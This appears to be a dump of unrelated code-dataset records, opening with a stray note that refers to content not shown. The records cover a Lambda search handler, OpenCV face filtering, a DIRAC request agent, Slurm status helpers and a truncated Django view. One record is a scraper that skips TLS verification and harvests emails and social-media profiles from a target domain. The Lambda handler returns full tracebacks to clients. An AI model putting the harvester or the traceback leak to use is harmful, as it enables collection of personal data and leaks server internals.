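The four-sum record above pairs A×B sums against a Counter of C×D sums, turning an O(n^4) scan into O(n^2); note the snippet relies on an implicit `collections` import (LeetCode injects it). A self-contained equivalent:

```python
import collections

def four_sum_count(A, B, C, D):
    # Count AB-pair sums, then look up the negation of each CD-pair sum.
    ab = collections.Counter(a + b for a in A for b in B)
    return sum(ab.get(-(c + d), 0) for c in C for d in D)

print(four_sum_count([1, 2], [-2, -1], [-1, 2], [0, 2]))  # 2
```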
Must be an integer.\n        page = 0\n        if 'page' in event:\n            try:\n                page = int(event['page'])\n            except ValueError:\n                return {\n                    'statusCode': 400,\n                    'body': json.dumps('Bad Request. \\'page\\' must be an integer.')\n                }\n\n        # If the user doesn't provide a product_name, just search for everything\n        if 'product_name' in event:\n            query = {\n                \"match\": {\n                    \"product_name\": event['product_name']\n                }\n            }\n        else:\n            query = {\n                \"match_all\": {}\n            }\n\n        # Search payload\n        payload = {\n            \"query\": query,\n            \"sort\": [\n                { \"date_created\": \"desc\"}\n            ],\n            \"from\": page * 10\n        }\n\n        # Make the request\n        r = requests.get(url + 'product/_search', auth=awsauth, json=payload)\n        print(r.text)\n\n        # Gather the data\n        data = json.loads(r.text)\n        hits = list(map(getData, data['hits']['hits']))\n        print(hits)\n\n\n        return {\n            'statusCode': 200,\n            'body': json.dumps(hits)\n        }\n\n    except Exception as e:\n        print(e)\n        return {\n            'statusCode': 500,\n            'body': json.dumps('Internal Server Error.' + json.dumps(traceback.format_exc()))\n        }\n","sub_path":"backend/es_get/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"103901590","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nimport urllib3\nurllib3.disable_warnings()\n\nclass req_domain:\n    \n    email_list = []\n    facebook = []\n    instagram = []\n    \n    def __init__(self ,Target ,pages):\n\n        self.pages = pages\n        self.Target = Target\n        header = {\n            \"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36\"\n        }\n\n        self.r = requests.get('https://www.{}/{}'.format(self.Target , self.pages) , headers=header , verify=False , timeout= 10)\n        if self.r.status_code == 200 or self.r.status_code == 300:\n            self.soup = BeautifulSoup(self.r.content , \"html.parser\")\n            self.html = self.soup.prettify()\n\n    def Get_emails(self):\n        \n        self.rgx = re.compile(r'[a-zA-Z0-9./-_+#]+'+'@+'+r'[a-zA-Z0-9./-_+#]+' , re.VERBOSE)\n        self.tmp_email = re.findall(self.rgx ,self.html)\n\n        if len(self.tmp_email) !=0:\n            for i in self.tmp_email:\n                if i.split('@')[0] not in ('\"',\"'\"):\n                    self.email_list.append(i)\n        \n        \n\n\n    def get_pages(self):\n\n        self.face_rgx = re.compile(r'(?:https?:)?\\/\\/(?:www\\.)?(?:facebook|fb)\\.com\\/(?P<profile>(?![A-z]+\\.php)(?!marketplace|gaming|watch|me|messages|help|search|groups)[A-z0-9_\\-\\.]+)\\/?' 
, re.VERBOSE)\n        self.Fac_page = re.findall(self.face_rgx , self.html)\n\n        if len(self.Fac_page) != 0:\n            for i in self.Fac_page:\n                self.facebook.append(i)\n\n        self.insta_rgx = re.compile(r'(?:https?:)?\\/\\/(?:www\\.)?(?:instagram\\.com|instagr\\.am)\\/(?P<username>[A-Za-z0-9_](?:(?:[A-Za-z0-9_]|(?:\\.(?!\\.))){0,28}(?:[A-Za-z0-9_]))?)' , re.VERBOSE)\n        self.insta_page = re.findall(self.insta_rgx , self.html)\n\n        if len(self.insta_page) != 0:\n            for i in self.insta_page:\n                self.instagram.append(i)","sub_path":"1N1TOne_EYE/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"234096545","text":"\"\"\" Experiment with face detection and image filtering using OpenCV \"\"\"\n\"\"\" This worked when I ran it on my home computer, but not here for some reason.\nI got permission from a Ninja to push.\"\"\"\n\nimport cv2\nimport numpy as np\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')\nkernel = np.ones((30, 30), 'uint8')\ncap = cv2.VideoCapture('Image_Processing_Test_Video.webm')\n\nwhile True:\n    # Capture frame-by-frame\n    ret, frame = cap.read()\n\n    if ret:\n        faces = face_cascade.detectMultiScale(frame, scaleFactor=1.2, minSize=(20, 20))\n        for (x, y, w, h) in faces:\n            frame[y:y+h, x:x+w, :] = cv2.dilate(frame[y:y+h, x:x+w, :], kernel)\n            # cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0))\n            # face\n            cv2.ellipse(frame, (x+int(w/2), y+int(h/2)), (int(0.9*w/2), int(h/2)), 0, 0, 360, (0, 0, 0), 2)\n            # mouth\n            cv2.ellipse(frame, (x+int(w/2), y+int(h/2)), (int(w/3), int(h/3)), 0, 45, 135, (0, 0, 0), 2)\n            # eyes\n            cv2.ellipse(frame, (x+int(2*w/7), y+int(2*h/5)), (int(w/10), int(h/15)), 0, 0, 360, (0, 0, 0), 2)\n            cv2.ellipse(frame, (x+int(5*w/7), y+int(2*h/5)), (int(w/10), int(h/15)), 0, 0, 360, (0, 0, 0), 2)\n\n        # Display the resulting frame\n        cv2.imshow('frame', frame)\n\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"617133608","text":"# -*- coding: utf-8 -*-\n\"\"\"\nEconomic Policy Analysis with Overlapping Generation Models\nProblem Set #3\nAlexandre B. 
Sollaci\nThe University of Chicago\nFall 2016\n\"\"\"\n\nimport numpy as np\n#import scipy.optimize as opt\n#import time\nimport functions_PS3 as functions\n#import matplotlib.pyplot as plt\n#from matplotlib.ticker import MultipleLocator\n#import os\n\n\nS = 80\nnvec = 0.2*np.ones(S)\nfor i in range(int(np.round(2*S/3))):\n    nvec[i] = 1.\nA = 1.\nalpha = 0.35\ndelta = 0.05\nbeta = 0.96\nsigma = 3\nL = sum(nvec)\nSS_tol = 1e-13\nEulDiff = True\n\nparams = (nvec, A, alpha, delta)\n\nbvec_guess = 0.1*np.ones(S-1)\n\nb_cnstr, c_cnstr, K_cnstr = functions.feasible(params, bvec_guess)\n\nparams = (beta, sigma, nvec, L, A, alpha, delta, SS_tol, EulDiff)\n\nss_output = functions.get_SS(params, bvec_guess, graphs = True)\n\nb_ss = ss_output['b_ss']\nK_ss = ss_output['K_ss']\nC_ss = ss_output['C_ss']\nmaxiter_TPI = 400\nmindist_TPI = 1e-9\nxi = 0.8\nbvec1 = 0.8*b_ss\nT = 320\nTPI_tol = 1e-9\ntpi_params = (S, T, beta, sigma, nvec, L, A, alpha, delta, b_ss, K_ss, C_ss,\n              maxiter_TPI, mindist_TPI, xi, TPI_tol, EulDiff)\n\ntpi_output = functions.get_TPI(tpi_params, bvec1, graphs = True)\n\n\n\n","sub_path":"Students/SollaciA/PS3/code/PS3_full.py","file_name":"PS3_full.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"123399368","text":"# Exercise:\n# Write a function get_score() that reads a score (an integer from 0 to 100) entered by the student; if the input is not an integer from 0 to 100, return 0, otherwise return the entered integer\n# e.g.:\n# def get_score():\n#     ...\n# score = get_score()\n# print(\"The score you entered is:\", score)\n\n# Method 1: wrap the call to get_score in a try statement\ndef get_score():\n    s = int(input(\"Enter a score (0~100): \"))\n    if not (0 <= s <= 100):\n        return 0\n    return s\n\ntry:\n    score = get_score()\nexcept ValueError:\n    # if no valid score was read, the student's score is 0\n    score = 0\nprint(\"The score you entered is:\", score)\n\n","sub_path":"python/python/老师笔记/python/day14/day14/exercise/get_score.py","file_name":"get_score.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} {"seq_id":"188710275","text":"########################################################################\n# File: RequestExecutingAgent.py\n# Author: Krzysztof.Ciba@NOSPAMgmail.com\n# Date: 2013/03/12 15:36:47\n########################################################################\n\n\"\"\" :mod: RequestExecutingAgent\n    ===========================\n\n    .. module: RequestExecutingAgent\n    :synopsis: request executing agent\n    .. 
moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com\n\n request processing agent\n\"\"\"\n\n__RCSID__ = '$Id$'\n\n# #\n# @file RequestExecutingAgent.py\n# @author Krzysztof.Ciba@NOSPAMgmail.com\n# @date 2013/03/12 15:36:56\n# @brief Definition of RequestExecutingAgent class.\n# # imports\nimport time\n# # from DIRAC\nfrom DIRAC import gMonitor, S_OK, S_ERROR, gConfig\nfrom DIRAC.Core.Base.AgentModule import AgentModule\nfrom DIRAC.ConfigurationSystem.Client import PathFinder\nfrom DIRAC.Core.Utilities.ProcessPool import ProcessPool\nfrom DIRAC.RequestManagementSystem.Client.ReqClient import ReqClient\nfrom DIRAC.RequestManagementSystem.private.RequestTask import RequestTask\n\n# # agent name\nAGENT_NAME = \"RequestManagement/RequestExecutingAgent\"\n\nclass AgentConfigError( Exception ):\n \"\"\" misconfiguration error \"\"\"\n def __init__( self, msg ):\n \"\"\" ctor\n :param str msg: error string\n \"\"\"\n Exception.__init__( self )\n self.msg = msg\n def __str__( self ):\n \"\"\" str op \"\"\"\n return self.msg\n\n########################################################################\nclass RequestExecutingAgent( AgentModule ):\n \"\"\"\n .. class:: RequestExecutingAgent\n\n request processing agent using ProcessPool, Operation handlers and RequestTask\n \"\"\"\n # # process pool\n __processPool = None\n # # request cache\n __requestCache = {}\n # # requests/cycle\n __requestsPerCycle = 100\n # # minimal nb of subprocess running\n __minProcess = 2\n # # maximal nb of subprocess executed same time\n __maxProcess = 4\n # # ProcessPool queue size\n __queueSize = 20\n # # file timeout\n __fileTimeout = 300\n # # operation timeout\n __operationTimeout = 300\n # # ProcessTask default timeout in seconds\n __taskTimeout = 900\n # # ProcessPool finalization timeout\n __poolTimeout = 900\n # # ProcessPool sleep time\n __poolSleep = 5\n # # placeholder for RequestClient instance\n __requestClient = None\n # # Size of the bulk if use of getRequests. 
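The per-file and per-operation defaults above (300 s each) feed the task-timeout budget computed later in `getTimeout`: every waiting operation contributes one per-operation timeout plus a per-file timeout for each of its files. A rough standalone sketch of that arithmetic (the operation names are illustrative only):

```python
def estimate_timeout(ops, per_operation=300, per_file=300):
    # ops: list of (operation_type, number_of_files) pairs
    return sum(per_operation + per_file * n_files for _, n_files in ops)

# two waiting operations carrying 3 and 1 files
print(estimate_timeout([("ReplicateAndRegister", 3), ("RemoveFile", 1)]))  # 1800
```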
If 0, use getRequest\n __bulkRequest = 0\n\n def __init__( self, *args, **kwargs ):\n \"\"\" c'tor \"\"\"\n # # call base class ctor\n AgentModule.__init__( self, *args, **kwargs )\n # # ProcessPool related stuff\n self.__requestsPerCycle = self.am_getOption( \"RequestsPerCycle\", self.__requestsPerCycle )\n self.log.info( \"Requests/cycle = %d\" % self.__requestsPerCycle )\n self.__minProcess = self.am_getOption( \"MinProcess\", self.__minProcess )\n self.log.info( \"ProcessPool min process = %d\" % self.__minProcess )\n self.__maxProcess = self.am_getOption( \"MaxProcess\", 4 )\n self.log.info( \"ProcessPool max process = %d\" % self.__maxProcess )\n self.__queueSize = self.am_getOption( \"ProcessPoolQueueSize\", self.__queueSize )\n self.log.info( \"ProcessPool queue size = %d\" % self.__queueSize )\n self.__poolTimeout = int( self.am_getOption( \"ProcessPoolTimeout\", self.__poolTimeout ) )\n self.log.info( \"ProcessPool timeout = %d seconds\" % self.__poolTimeout )\n self.__poolSleep = int( self.am_getOption( \"ProcessPoolSleep\", self.__poolSleep ) )\n self.log.info( \"ProcessPool sleep time = %d seconds\" % self.__poolSleep )\n self.__taskTimeout = int( self.am_getOption( \"ProcessTaskTimeout\", self.__taskTimeout ) )\n self.log.info( \"ProcessTask timeout = %d seconds\" % self.__taskTimeout )\n self.__bulkRequest = self.am_getOption( \"BulkRequest\", 0 )\n self.log.info( \"Bulk request size = %d\" % self.__bulkRequest )\n\n # # keep config path and agent name\n self.agentName = self.am_getModuleParam( \"fullName\" )\n self.__configPath = PathFinder.getAgentSection( self.agentName )\n\n # # operation handlers over here\n opHandlersPath = \"%s/%s\" % ( self.__configPath, \"OperationHandlers\" )\n opHandlers = gConfig.getSections( opHandlersPath )\n if not opHandlers[\"OK\"]:\n self.log.error( opHandlers[\"Message\" ] )\n raise AgentConfigError( \"OperationHandlers section not found in CS under %s\" % self.__configPath )\n opHandlers = opHandlers[\"Value\"]\n\n\n self.timeOuts = dict()\n\n # # handlers dict\n self.handlersDict = dict()\n for opHandler in opHandlers:\n opHandlerPath = \"%s/%s/Location\" % ( opHandlersPath, opHandler )\n opLocation = gConfig.getValue( opHandlerPath, \"\" )\n if not opLocation:\n self.log.error( \"%s not set for %s operation handler\" % ( opHandlerPath, opHandler ) )\n continue\n self.timeOuts[opHandler] = { \"PerFile\": self.__fileTimeout, \"PerOperation\": self.__operationTimeout }\n\n opTimeout = gConfig.getValue( \"%s/%s/TimeOut\" % ( opHandlersPath, opHandler ), 0 )\n if opTimeout:\n self.timeOuts[opHandler][\"PerOperation\"] = opTimeout\n fileTimeout = gConfig.getValue( \"%s/%s/TimeOutPerFile\" % ( opHandlersPath, opHandler ), 0 )\n if fileTimeout:\n self.timeOuts[opHandler][\"PerFile\"] = fileTimeout\n\n self.handlersDict[opHandler] = opLocation\n\n self.log.info( \"Operation handlers:\" )\n for item in enumerate ( self.handlersDict.items() ):\n opHandler = item[1][0]\n self.log.info( \"[%s] %s: %s (timeout: %d s + %d s per file)\" % ( item[0], item[1][0], item[1][1],\n self.timeOuts[opHandler]['PerOperation'],\n self.timeOuts[opHandler]['PerFile'] ) )\n\n # # common monitor activity\n gMonitor.registerActivity( \"Iteration\", \"Agent Loops\",\n \"RequestExecutingAgent\", \"Loops/min\", gMonitor.OP_SUM )\n gMonitor.registerActivity( \"Processed\", \"Request Processed\",\n \"RequestExecutingAgent\", \"Requests/min\", gMonitor.OP_SUM )\n gMonitor.registerActivity( \"Done\", \"Request Completed\",\n \"RequestExecutingAgent\", \"Requests/min\", 
gMonitor.OP_SUM )\n # # create request dict\n self.__requestCache = dict()\n\n self.FTSMode = self.am_getOption( \"FTSMode\", False )\n\n\n\n def processPool( self ):\n \"\"\" facade for ProcessPool \"\"\"\n if not self.__processPool:\n minProcess = max( 1, self.__minProcess )\n maxProcess = max( self.__minProcess, self.__maxProcess )\n queueSize = abs( self.__queueSize )\n self.log.info( \"ProcessPool: minProcess = %d maxProcess = %d queueSize = %d\" % ( minProcess,\n maxProcess,\n queueSize ) )\n self.__processPool = ProcessPool( minProcess,\n maxProcess,\n queueSize,\n poolCallback = self.resultCallback,\n poolExceptionCallback = self.exceptionCallback )\n self.__processPool.daemonize()\n return self.__processPool\n\n def requestClient( self ):\n \"\"\" RequestClient getter \"\"\"\n if not self.__requestClient:\n self.__requestClient = ReqClient()\n return self.__requestClient\n\n def cacheRequest( self, request ):\n \"\"\" put request into requestCache\n\n :param Request request: Request instance\n \"\"\"\n count = 5\n # Wait a bit as there may be a race condition between RequestTask putting back the request and the callback clearing the cache\n while request.RequestName in self.__requestCache:\n count -= 1\n if not count:\n self.requestClient().putRequest( request )\n return S_ERROR( \"Duplicate request, ignore: %s\" % request.RequestName )\n time.sleep( 1 )\n self.__requestCache[ request.RequestName ] = request\n return S_OK()\n\n def putRequest( self, requestName, taskResult = None ):\n \"\"\" put back :requestName: to RequestClient\n\n :param str requestName: request's name\n \"\"\"\n if requestName in self.__requestCache:\n request = self.__requestCache.pop( requestName )\n if taskResult and taskResult['OK']:\n request = taskResult['Value']\n\n reset = self.requestClient().putRequest( request )\n if not reset[\"OK\"]:\n return S_ERROR( \"putRequest: unable to reset request %s: %s\" % ( requestName, reset[\"Message\"] ) )\n else:\n return S_ERROR( 'Not in cache' )\n return S_OK()\n\n def putAllRequests( self ):\n \"\"\" put back all requests without callback called into requestClient\n\n :param self: self reference\n \"\"\"\n self.log.info( \"putAllRequests: will put %s back requests\" % len( self.__requestCache ) )\n for requestName in self.__requestCache.keys():\n reset = self.putRequest( requestName )\n if not reset[\"OK\"]:\n self.log.error( reset[\"Message\"] )\n else:\n self.log.debug( \"putAllRequests: request %s has been put back with its initial state\" % requestName )\n return S_OK()\n\n def initialize( self ):\n \"\"\" initialize agent\n \"\"\"\n return S_OK()\n\n def execute( self ):\n \"\"\" read requests from RequestClient and enqueue them into ProcessPool \"\"\"\n gMonitor.addMark( \"Iteration\", 1 )\n # # requests (and so tasks) counter\n taskCounter = 0\n while taskCounter < self.__requestsPerCycle:\n self.log.debug( \"execute: executing %d request in this cycle\" % taskCounter )\n\n requestsToExecute = []\n\n if not self.__bulkRequest:\n self.log.info( \"execute: ask for a single request\" )\n getRequest = self.requestClient().getRequest()\n if not getRequest[\"OK\"]:\n self.log.error( \"execute: %s\" % getRequest[\"Message\"] )\n break\n if not getRequest[\"Value\"]:\n self.log.info( \"execute: no more 'Waiting' requests to process\" )\n break\n requestsToExecute = [getRequest[\"Value\"] ]\n else:\n numberOfRequest = min( self.__bulkRequest, self.__requestsPerCycle - taskCounter )\n self.log.info( \"execute: ask for %s requests\" % numberOfRequest )\n getRequests 
= self.requestClient().getBulkRequests( numberOfRequest )\n if not getRequests[\"OK\"]:\n self.log.error( \"execute: %s\" % getRequests[\"Message\"] )\n break\n if not getRequests[\"Value\"]:\n self.log.info( \"execute: no more 'Waiting' requests to process\" )\n break\n for rId in getRequests[\"Value\"][\"Failed\"]:\n self.log.error( \"execute: %s\" % getRequests[\"Value\"][\"Failed\"][rId] )\n\n requestsToExecute = getRequests[\"Value\"][\"Successful\"].values()\n\n self.log.info( \"execute: will execute %s requests \" % len( requestsToExecute ) )\n\n for request in requestsToExecute:\n # # set task id\n taskID = request.RequestName\n # # save current request in cache\n self.cacheRequest( request )\n # # serialize to JSON\n requestJSON = request.toJSON()\n if not requestJSON[\"OK\"]:\n self.log.error( \"JSON serialization error: %s\" % requestJSON[\"Message\"] )\n break\n requestJSON = requestJSON[\"Value\"]\n\n self.log.info( \"processPool tasks idle = %s working = %s\" % ( self.processPool().getNumIdleProcesses(),\n self.processPool().getNumWorkingProcesses() ) )\n\n looping = 0\n while True:\n if not self.processPool().getFreeSlots():\n if not looping:\n self.log.info( \"No free slots available in processPool, will wait %d seconds to proceed\" % self.__poolSleep )\n time.sleep( self.__poolSleep )\n looping += 1\n else:\n if looping:\n self.log.info( \"Free slot found after %d seconds\" % looping * self.__poolSleep )\n looping = 0\n self.log.info( \"spawning task for request '%s'\" % ( request.RequestName ) )\n timeOut = self.getTimeout( request )\n enqueue = self.processPool().createAndQueueTask( RequestTask,\n kwargs = { \"requestJSON\" : requestJSON,\n \"handlersDict\" : self.handlersDict,\n \"csPath\" : self.__configPath,\n \"agentName\": self.agentName },\n taskID = taskID,\n blocking = True,\n usePoolCallbacks = True,\n timeOut = timeOut )\n if not enqueue[\"OK\"]:\n self.log.error( enqueue[\"Message\"] )\n else:\n self.log.debug( \"successfully enqueued task '%s'\" % taskID )\n # # update monitor\n gMonitor.addMark( \"Processed\", 1 )\n # # update request counter\n taskCounter += 1\n # # task created, a little time kick to proceed\n time.sleep( 0.1 )\n break\n\n # # clean return\n return S_OK()\n\n def getTimeout( self, request ):\n \"\"\" get timeout for request \"\"\"\n timeout = 0\n for op in request:\n if op.Status not in ( \"Waiting\", \"Scheduled\", 'Queued' ):\n continue\n if op.Type not in self.timeOuts:\n timeout += self.__operationTimeout\n else:\n perOp = self.timeOuts[op.Type].get( \"PerOperation\", self.__operationTimeout )\n perFiles = self.timeOuts[op.Type].get( \"PerFile\", self.__fileTimeout ) * len( op )\n timeout += perOp + perFiles\n self.log.info( \"estimated timeOut for request %s is %s\" % ( request.RequestName, timeout ) )\n return timeout\n\n def finalize( self ):\n \"\"\" agent finalization \"\"\"\n if self.__processPool:\n self.processPool().finalize( timeout = self.__poolTimeout )\n self.putAllRequests()\n return S_OK()\n\n def resultCallback( self, taskID, taskResult ):\n \"\"\" definition of request callback function\n\n :param str taskID: Request.RequestName\n :param dict taskResult: task result S_OK(Request)/S_ERROR(Message)\n \"\"\"\n # # clean cache\n res = self.putRequest( taskID, taskResult )\n self.log.info( \"callback: %s result is %s(%s), put %s(%s)\" % ( taskID,\n \"S_OK\" if taskResult[\"OK\"] else \"S_ERROR\",\n taskResult[\"Value\"].Status if taskResult[\"OK\"] else taskResult[\"Message\"],\n \"S_OK\" if res['OK'] else 'S_ERROR',\n '' 
if res['OK'] else res['Message'] ) )\n\n\n  def exceptionCallback( self, taskID, taskException ):\n    \"\"\" definition of exception callback function\n\n    :param str taskID: Request.RequestName\n    :param Exception taskException: Exception instance\n    \"\"\"\n    self.log.error( \"exceptionCallback: %s was hit by exception %s\" % ( taskID, taskException ) )\n    self.putRequest( taskID )\n","sub_path":"RequestManagementSystem/Agent/RequestExecutingAgent.py","file_name":"RequestExecutingAgent.py","file_ext":"py","file_size_in_byte":15280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} {"seq_id":"20051625","text":"#Krzysztof Miśkowicz\n\ndef is_primary(n):\n    if n == 2 or n == 3:\n        return True\n    if n < 2 or n % 2 == 0 or n % 3 == 0:\n        return False\n    divider = 5\n    while divider*divider <= n:\n        if n % divider == 0 or n % (divider+2) == 0:\n            return False\n        divider += 6\n\n    return True\n\nn_numbers = 1\n\ndef divide(N):\n    global n_numbers\n    if is_primary(N) and is_primary(n_numbers):\n        return True\n\n    digits = 1\n    while N >= 10 ** digits:\n        digits += 1\n\n    if digits == 1:\n        return False\n\n    result = False\n    for i in range(1, digits):\n        if is_primary(N % (10 ** i)):\n            n_numbers += 1\n            result = result or divide(N // (10 ** i))\n            n_numbers -= 1\n\n    return result\n\nprint(divide(273)) # True, split 2|7|3\nprint(divide(22222)) # True, split 2|2|2|2|2\nprint(divide(23672)) # True, split 23|67|2\nprint(divide(2222)) # False\nprint(divide(21722)) # False\n","sub_path":"Kolokwium_2/zad.py","file_name":"zad.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"170482765","text":"from typing import List, Dict, Optional, Callable\n\nfrom trailblazer.apps.slurm.models import SqueueResult\nfrom trailblazer.constants import FileFormat, SlurmJobStatus, TrailblazerStatus\nfrom trailblazer.exc import EmptySqueueError\nfrom trailblazer.io.controller import ReadStream\nfrom trailblazer.apps.slurm.utils import formatters\n\n\ndef get_squeue_result(squeue_response: str) -> SqueueResult:\n    \"\"\"Return SqueueResult object from squeue response.\n    Raises:\n        TrailblazerError: when no entries were returned by squeue command.\n    \"\"\"\n    if not squeue_response:\n        raise EmptySqueueError(\"No jobs found in SLURM registry\")\n    squeue_response_content: List[dict] = ReadStream.get_content_from_stream(\n        file_format=FileFormat.CSV,\n        stream=squeue_response,\n        read_to_dict=True,\n    )\n    return SqueueResult(jobs=squeue_response_content)\n\n\ndef reformat_squeue_result_job_step(data_analysis: str, job_step: str) -> str:\n    \"\"\"Standardise job step string according to data analysis.\"\"\"\n    formatter: Callable = formatters.formatter_map.get(data_analysis, formatters.reformat_undefined)\n    return formatter(job_step=job_step)\n\n\ndef _get_analysis_single_status(jobs_status_distribution: Dict[str, float]) -> str:\n    \"\"\"Return the analysis status if the distribution contains only one job status.\"\"\"\n    if len(jobs_status_distribution) == 1:\n        single_status: str = jobs_status_distribution.popitem()[0]\n        return (\n            TrailblazerStatus.FAILED\n            if single_status == SlurmJobStatus.TIME_OUT\n            else TrailblazerStatus[single_status.upper()]\n        )\n\n\ndef _is_analysis_failed(jobs_status_distribution: Dict[str, float]) -> bool:\n    \"\"\"Return true if any job was broken.\"\"\"\n    broken_statuses: List[str] = [SlurmJobStatus.FAILED, SlurmJobStatus.TIME_OUT]\n    for broken_status in broken_statuses:\n        if jobs_status_distribution.get(broken_status):\n            
return True\n\n\ndef _is_analysis_ongoing(jobs_status_distribution: Dict[str, float]) -> bool:\n \"\"\"Return True if analysis is still ongoing.\"\"\"\n return bool(\n jobs_status_distribution.get(SlurmJobStatus.RUNNING)\n or jobs_status_distribution.get(SlurmJobStatus.PENDING)\n )\n\n\ndef get_current_analysis_status(jobs_status_distribution: Dict[str, float]) -> str:\n \"\"\"Return current analysis status based on jobs status distribution.\"\"\"\n single_analysis_status: Optional[str] = _get_analysis_single_status(\n jobs_status_distribution=jobs_status_distribution\n )\n if single_analysis_status:\n return single_analysis_status\n is_analysis_ongoing: bool = _is_analysis_ongoing(\n jobs_status_distribution=jobs_status_distribution\n )\n is_analysis_failed: bool = _is_analysis_failed(\n jobs_status_distribution=jobs_status_distribution\n )\n if is_analysis_failed:\n return TrailblazerStatus.ERROR if is_analysis_ongoing else TrailblazerStatus.FAILED\n if is_analysis_ongoing:\n return TrailblazerStatus.RUNNING\n return TrailblazerStatus.CANCELLED\n","sub_path":"trailblazer/apps/slurm/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"306326179","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import messages\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.http import HttpResponse\n\nfrom .models import Course\nfrom .forms import CourseForm\nimport datetime\nimport json\n\n# Returns the list page with all courses\ndef index(request):\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. Must be logged in')\n return redirect('login')\n\n # Fetch courses from db\n courses = Course.objects.order_by('title').filter(is_hidden=False, user_id=request.user.id)\n\n # Pagination\n paginator = Paginator(courses, 10)\n page = request.GET.get('page')\n paged_courses = paginator.get_page(page)\n\n # Data that is passed to the template\n context = {\n 'courses': paged_courses,\n }\n\n # Renders the template with the data that can be accesed\n return render(request, 'courses/course_list.html', context)\n\n# Returns the detail info of a course. Also used to create and update courses\ndef course(request, course_id=0):\n if request.method == \"POST\":\n # Kick user if not logged in\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. Must be logged in')\n return redirect('login')\n\n # Get the POST form\n form = CourseForm(request.POST)\n\n if form.is_valid():\n course_id = form.cleaned_data['course_id']\n title = form.cleaned_data['title']\n description = form.cleaned_data['description']\n\n # Searches the db for a course with the id and updates it. 
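Assuming the trailblazer package is importable, the resolution order above (single status, then failed, then ongoing) can be exercised directly; the lowercase status strings below are an assumption about the `SlurmJobStatus` constants, suggested by the `.upper()` lookup in `_get_analysis_single_status`:

```python
from trailblazer.apps.slurm.api import get_current_analysis_status

# fractions of jobs per SLURM state (keys assumed lowercase)
print(get_current_analysis_status({"running": 0.6, "pending": 0.4}))  # running
print(get_current_analysis_status({"failed": 0.2, "running": 0.8}))   # error: failed jobs while still ongoing
print(get_current_analysis_status({"failed": 1.0}))                   # failed: single terminal status
```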
if not found, creates a new course and returns is_created=True\n course, is_created = Course.objects.update_or_create(\n id=course_id,\n defaults={\n 'title': title,\n 'description': description,\n\t 'user_id': request.user.id\n },\n )\n\n # Save in the db\n course.save()\n\n # If event was created via calendar page, return the id\n if 'is_calendar_form' in request.POST:\n\n context = {\n 'id': course.id,\n 'title': course.title,\n 'description': course.description,\n\t 'user_id': request.user.id\n }\n context = json.dumps(context)\n return HttpResponse(context)\n\n # UI success message\n messages.success(request, 'Course created successfully')\n\n # If it was updated return the page and form\n if not is_created:\n context = {\n 'form': form\n }\n return render(request, 'courses/course_detail.html', context)\n\n # If it was created, redirect to url with id\n return redirect('course_detail', course_id=course.id) #redirect(url path name, id specified in the path)\n\n # Form was invalid, so return it\n context = {\n 'form': form\n }\n\n # UI error message\n messages.error(request, 'Course was not created')\n\n return render(request, 'courses/course_detail.html', context)\n\n else:\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. Must be logged in')\n return redirect('login')\n\n # If viewing detail of an existing course, fill the form with its values. if not, show form with blank and default values\n context = {}\n\n if course_id > 0:\n course = get_object_or_404(Course, pk=course_id)\n\n form = CourseForm(initial={\n 'course_id': course.id,\n 'title': course.title,\n 'description': course.description\n })\n # Get event notes and exams\n courses = Course.objects.all().filter(title=course.title,is_hidden=False)\n\n context['form'] = form\n context['courses'] = courses\n\n else:\n form = CourseForm(initial={\n })\n\n context['form'] = form\n\n return render(request, 'courses/course_detail.html', context)\n\n# Search for courses \ndef search(request):\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. Must be logged in')\n return redirect('login')\n\n queryset_list = Course.objects.order_by('title').filter(is_hidden=False, user_id=request.user.id)\n\n # Title\n if 'title' in request.GET:\n title = request.GET['title']\n # Check if empty string\n if title:\n # Search title for anything that matches a keyword\n queryset_list = queryset_list.filter(title__icontains=title)\n\n context = {\n 'courses': queryset_list,\n }\n\n # Request contains at least one form field, return the form with its field values\n if 'title' in request.GET:\n form = CourseForm(initial={\n 'title': request.GET['title']\n })\n\n search_form_defaults(form)\n\n context['form'] = form\n\n # Request does not contain form submission, return empty form\n else:\n form = CourseForm()\n\n search_form_defaults(form)\n\n context['form'] = form\n\n\n return render(request, 'courses/course_search.html', context)\n\n# Marks a course as hidden\ndef remove(request):\n if request.method == 'POST':\n if not request.user.is_authenticated:\n messages.error(request, 'Unauthorized. 
